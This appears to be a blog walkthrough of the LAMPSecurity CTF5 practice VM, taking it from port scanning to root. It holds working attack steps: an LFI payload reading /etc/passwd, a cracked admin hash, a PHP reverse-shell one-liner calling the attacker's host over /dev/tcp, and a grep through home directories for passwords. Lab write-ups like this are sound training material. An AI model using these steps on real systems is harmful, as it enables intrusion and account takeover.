• VM: LAMPSecurity: CTF5
  • Goal: Gain root access
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
ctf5 target discovery

Port Scanning

nmap -p- -A 192.168.172.240
  • Port 22: OpenSSH 4.7
  • Port 25: SMTP
  • Port 80: Apache httpd 2.2.6
  • Port 110: pop3 ipop3d 2006k.101
  • Port 111: RPC #100000
  • Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
  • Port 143: University of Washington IMAP imapd 2006k.396
  • Port 445: Samba 3.0.26a-6.fc8
  • Port 901: Samba SWAT administration server
  • Port 3306: MySQL 5.0.45

Enumeration

There’s quite a few ports open. First let’s check out the website.

Homepage

I test around the site against SQL injection but didn’t find any.

Then identified LFI (local file inclusion) vulnerability against the page parameter.

http://192.168.172.240?page=../../../../etc/passwd%00
LFI

Further checking the website shows that the website is using NanoCMS for Blogging (Blog tab).

NanoCMS

Google about NanoCMS vulnerability quickly showed /data/pagesdata.txt exposes password hash. Try on the website and returned the file with password hash.

http://192.168.172.240/~andy/data/pagesdata.txt
NanoCMS password hash

username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd

The hash has 32 hex characters so most likely MD5 hash.I use website md5decrypt.net and is able to find the password quickly: shannon

username: admin,    password: shannon

Exploitation

All right. Good start. Let’s try to login at the Admin Login of Andy’s Blog page. And sure enough, login successfully to the NanoCMS Admin Panel.

NanoCMS Admin Panel

I look around the Admin Panel and quickly spot something very interesting: ‘New Page‘. Looks like I can create new blog pages there. I quickly create a new blog page with simple php code to test if php code execution is allowed.

test php

I added the Page and then click on new blog page ‘Testing‘ at Pages & Options.

Awesome. Php code execution is allowed.

Limited Shell

We can use php code execution to create a reverse shell. First start Netcat at kali box to listen to port 4444:

nc -lp 4444

Then modify the Testing blog page content to: (note: kali box ip address is 192.168.172.110)

<?php
system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1");
?>

Now refresh the Testing blog page again and observe the kali box:

limited shell

That’s great. We got a shell access as user apache

Privilege Escalation

With shell access, we search around the system looking for useful information to gain root access. That include sudo usage, setuid commands, configuration files & users’ files.

Luckily, we come across the root password while searching for password recursively in /home directory using the following search command:

grep -R -i password /home/* 2> /dev/null
possible root password

Looks like the .note file in patrick’s folder may have root password.

cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
found root password
Root password: 50$cent

Let’s try it out

root access

Bingo! Root access.

Thank you Author madirish2600 for the box LAMPSecurity: CTF5

This Post Has 2 Comments

  1. grep -R -i password /home/* 2> /dev/null
    can you please explain this command

    1. It searches for files in folder /home recursively that contains the text ‘password’.
      -R: recursively
      -i: case insensitive
      2> /dev/null: do not display errors (e.g. permission denied)

Leave a Reply

Close Menu